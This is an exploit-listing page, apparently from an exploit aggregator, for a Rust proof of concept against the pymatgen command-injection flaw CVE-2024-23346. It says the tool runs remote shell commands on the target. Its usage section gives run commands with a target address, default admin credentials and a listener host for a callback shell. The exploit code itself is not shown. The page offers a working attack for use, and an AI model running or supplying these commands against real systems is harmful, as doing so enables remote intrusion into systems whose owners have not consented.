Exploit for Command Injection in Materialsvirtuallab Pymatgen CVE-2024-23346

Name: Exploit for Command Injection in Materialsvirtuallab Pymatgen CVE-2024-23346
Rating: 5 (184 reviews)

2025-02-25 | CVSS 9.3

## https://sploitus.com/exploit?id=6C172766-5A68-5CF9-99D6-DAEBEAFA99F5
A Rust exploitation script for CVE-2024-23346.

As shown below the POC uses the code injection vulnerability and runs remote shell commands like in a Terminal.


[poc.webm](https://github.com/user-attachments/assets/0d1e15d8-21c3-4c32-9ae2-8539461ca257)

---
Steps to run the exploit:
- Run directly with `Cargo`
    - `cargo run -- --help`
    - `cargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19`

OR

- Compile the Binary: `cargo build -r` (binary will be in `target/release/poc`)
- Run the Binary:
    - `./poc --help`
    - `./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19`


---
Exploit script is inspired from Python Scripting Expert [MAWK0235](https://github.com/MAWK0235)